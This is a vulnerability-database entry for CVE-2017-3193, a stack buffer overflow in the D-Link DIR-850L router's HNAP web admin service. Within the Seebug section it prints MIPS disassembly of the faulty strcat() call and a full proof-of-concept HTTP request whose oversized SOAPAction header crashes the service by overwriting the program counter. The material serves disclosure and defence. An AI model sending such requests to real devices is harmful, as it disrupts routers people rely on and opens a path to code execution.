Vulnerabilities > CVE-2017-3193 - Improper Restriction of Operations within the Bounds of a Memory Buffer vulnerability in Dlink Dir-850L Firmware 1.14B07/2.07.B05
Attack vector
ADJACENT_NETWORK Attack complexity
LOW Privileges required
NONE Confidentiality impact
HIGH Integrity impact
HIGH Availability impact
HIGH Summary
Multiple D-Link devices including the DIR-850L firmware versions 1.14B07 and 2.07.B05 contain a stack-based buffer overflow vulnerability in the web administration interface HNAP service.
Vulnerable Configurations
| Part | Description | Count |
|---|---|---|
| OS | 2 | |
| Hardware | 1 |
Common Weakness Enumeration (CWE)
Common Attack Pattern Enumeration and Classification (CAPEC)
- Buffer Overflow via Environment Variables This attack pattern involves causing a buffer overflow through manipulation of environment variables. Once the attacker finds that they can modify an environment variable, they may try to overflow associated buffers. This attack leverages implicit trust often placed in environment variables.
- Overflow Buffers Buffer Overflow attacks target improper or missing bounds checking on buffer operations, typically triggered by input injected by an attacker. As a consequence, an attacker is able to write past the boundaries of allocated buffer regions in memory, causing a program crash or potentially redirection of execution as per the attackers' choice.
- Client-side Injection-induced Buffer Overflow This type of attack exploits a buffer overflow vulnerability in targeted client software through injection of malicious content from a custom-built hostile service.
- Filter Failure through Buffer Overflow In this attack, the idea is to cause an active filter to fail by causing an oversized transaction. An attacker may try to feed overly long input strings to the program in an attempt to overwhelm the filter (by causing a buffer overflow) and hoping that the filter does not fail securely (i.e. the user input is let into the system unfiltered).
- MIME Conversion An attacker exploits a weakness in the MIME conversion routine to cause a buffer overflow and gain control over the mail server machine. The MIME system is designed to allow various different information formats to be interpreted and sent via e-mail. Attack points exist when data are converted to MIME compatible format and back.
Seebug
| bulletinFamily | exploit |
| description | The affected service is the management web, in the cgibin file located within the htdocs folder on the router filesystem. The vulnerability is a Stack-Based Buffer Overflow, caused by a non-controlled use of the strcat() function that allows an overwrite of the PC, and thus the execution flow of the program, allowing arbitrary code execution.The call to strcat that is causing the Buffer Overflow is located at the offset 0x414a20. From the arguments passed to strcat the first (destination) corresponds to the second part of the HNAP_AUTH header, and the second (source) corresponds to the content of the SOAPAction header. If the size of the content of the SOAPAction plus the second part of the HNAP_AUTH header is more than 547 bytes, it will overflow and the following 4 overwritten bytes will correspond tothe stored PC ``` 0x00414130 8f998410 lw t9, -0x7bf0(gp) ;[0x43ad50:4]=0x4251e0 sym.imp.getenv 0x00414134 0320f809 jalr t9 0x00414138 24847dac addiu a0, a0, 0x7dac ; HTTP_SOAPACTION 0x0041413c 3c040042 lui a0, 0x42 0x00414140 8fbc0020 lw gp, 0x20(sp) 0x00414144 2484615c addiu a0, a0, 0x615c 0x00414148 8f998410 lw t9, -0x7bf0(gp) ; [0x43ad50:4]=0x4251e0 sym.imp.getenv 0x0041414c 0320f809 jalr t9 0x00414150 00408821 move s1, v0 ; HTTP_SOAPACTION saved to s1... 0x00414a14 02402021 move a0, s2 ; arg1 (dest) 0x00414a18 8fbc0020 lw gp, 0x20(sp) 0x00414a1c 8f9982b0 lw t9, -0x7d50(gp) ; [0x43abf0:4]=0x4253e0 sym.imp.strcat 0x00414a20 0320f809 jalr t9 ; Call to strcat 0x00414a24 02202821 move a1, s1 ; arg2 (src) ``` The following request is a Proof of Concept that will cause the process to crash, by overwriting the PC with the value 0x41414141. Note that the following is a modification of a legitimate request and that not all the headers are necessary to cause the crash ``` POST /HNAP1/ HTTP/1.1 Host: 192.168.0.1 User-Agent: Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflateContent-Type: text/xml; charset=utf-8SOAPAction: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXAAAAHNAP_AUTH: BBD0605AF8690024AF8568BE88DD7B8E 1482588069X-Requested-With: XMLHttpRequestReferer: http://192.168.0.1/info/Login.htmlContent-Length: 306Cookie: uid=kV8BSOXCocConnection: close ``` |
| id | SSV:92825 |
| last seen | 2017-11-19 |
| modified | 2017-03-26 |
| published | 2017-03-26 |
| reporter | Root |
| title | D-LINK DIR-850L web admin interface vulnerable to stack-based buffer overflow (CVE-2017-3193 ) |
References
- http://www.securityfocus.com/bid/96747
- http://www.securityfocus.com/bid/96747
- https://tools.cisco.com/security/center/viewAlert.x?alertId=52967
- https://tools.cisco.com/security/center/viewAlert.x?alertId=52967
- https://twitter.com/NCCGroupInfosec/status/845269159277723649
- https://twitter.com/NCCGroupInfosec/status/845269159277723649
- https://www.kb.cert.org/vuls/id/305448
- https://www.kb.cert.org/vuls/id/305448
- https://www.nccgroup.trust/uk/our-research/d-link-dir-850l-web-admin-interface-vulnerable-to-stack-based-buffer-overflow/?research=Technical+advisories
- https://www.nccgroup.trust/uk/our-research/d-link-dir-850l-web-admin-interface-vulnerable-to-stack-based-buffer-overflow/?research=Technical+advisories